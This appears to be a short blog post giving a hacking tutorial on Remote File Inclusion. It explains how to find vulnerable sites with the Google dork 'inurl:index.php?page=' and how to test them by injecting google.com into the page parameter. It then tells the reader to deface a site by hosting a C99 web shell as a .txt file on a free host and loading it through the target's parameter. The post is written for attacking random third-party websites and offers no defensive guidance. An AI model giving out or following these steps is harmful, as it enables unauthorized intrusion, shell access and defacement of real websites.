Assalam-o-Alaikum & Hello To All Members
What is Remote File Inclusion?
Remote File Inclusion (RFI) is a type of vulnerability most often found on websites. It allows an attacker to include a remote file, usually through a script on the web server. The vulnerability occurs due to the use of user-supplied input without proper validation.
Lets Start!
1st Step: Find a Vunerable websites using Google Dorks
"inurl:index.php?page=” its a Dork of RFI You Can Find More Dorks By Searching on Google
2 Step: Now Click on One of The Site And Check that this Site is Vulnerable to Remote File Inclusion
3 Step: Remote File inclusion vulnerability is usually occurred in those sites which have a navigation similar to the below one
http://www.Targetsite.com/index.php?page=Anything
4 Step: Now To Check This Site Simply Change Anything With http://www.google.com
Example http://www.targetsite.com/index.php?page=www.google.com
5 Step: IF Google home page showed up then the website is Vulnerable for RFI
IF Not Then Find Another One
How to Deface a Website with RFI
1 Step: IF The Site is Vulnerable to RFI Then Hacker Would Upload The Shell To Gain Access I Would Like to Use C99 Shell
2 Step: Well now open any website or any free host and upload your shell in .txt
and replace http://www.google.com to your shell link so for EXAPMLE it will be:
http://www.yourfreehost.com/shell.txt?
3 Step: Do Not Forget the "?" in the end of the URL
4 Step: Now Your Shell Will Show
Take A Second To Say Thanks
Give Respect Take Respect
0 comments:
Post a Comment